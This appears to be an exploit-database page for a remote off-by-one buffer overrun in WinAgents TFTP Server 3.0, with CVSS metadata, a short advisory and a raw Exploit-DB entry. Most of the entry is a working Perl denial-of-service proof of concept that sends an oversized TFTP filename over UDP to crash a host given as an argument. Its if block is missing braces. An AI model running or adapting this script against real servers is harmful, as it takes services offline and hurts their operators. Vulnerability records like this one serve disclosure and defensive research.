header-logo
Suggest Exploit
vendor:
TFTP Server
by:
Unknown
7.5
CVSS
HIGH
Remote Off-by-One Buffer Overrun
119
CWE
Product Name: TFTP Server
Affected Version From: WinAgents TFTP Server ver 3.0
Affected Version To: WinAgents TFTP Server ver 3.0
Patch Exists: No
Related CWE: Unknown
CPE: a:winagents:tftp_server:3.0
Metasploit:
Other Scripts:
Platforms Tested:
Unknown

WinAgents TFTP Server Remote Off-by-One Buffer Overrun Vulnerability

The WinAgents TFTP Server is prone to a remote off-by-one buffer overrun vulnerability. The issue occurs due to a lack of sufficient boundary checks performed on filenames when a request is made for a file. A remote attacker can exploit this vulnerability by sending a malicious request with a filename of excessive length, triggering the vulnerability and resulting in a denial of service.

Mitigation:

No known mitigation or remediation
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/10526/info

WinAgents TFTP Server is reported prone to a remote off-by-one buffer overrun vulnerability. The issue is reported to exist due to a lack of sufficient boundary checks performed on filenames when a request is made for a file. A remote attacker may make a malicious request to the server for a filename of excessive length. This request will trigger the vulnerability. Immediate consequences of such an attack will reportedly result in a denial of service.

#!/usr/bin/perl
# 
# Remote D.O.S WinAgents TFTP Server ver 3.0 
# 
# Tftp.pl <Host>

use IO::Socket;

$Tftp_Port = "69";
$FileName = "A"x1000;
$Tftp_OP = "\x00\x01";
$Tftp_M  = "bin";
$Buf = $Tftp_OP . $Tftp_M . $FileName ;

if(!($ARGV[0]))
 
 print "\nUsage: perl $0 <Host>\n" ;
 
 exit;
 

print "\nRemote D.O.S WinAgents TFTP Server ver 3.0 PoC\n\n\n";


$socket = IO::Socket::INET->new(Proto => "udp") or die "Socket Error ...\n"
;
$ipaddr = inet_aton($ARGV[0]);
$portaddr = sockaddr_in($Tftp_Port, $ipaddr);
send($socket, $Buf, 0, $portaddr) == length($Buf) or die "Error : Can't send ...\n";
print "Server : $ARGV[0] Is Down ... \n";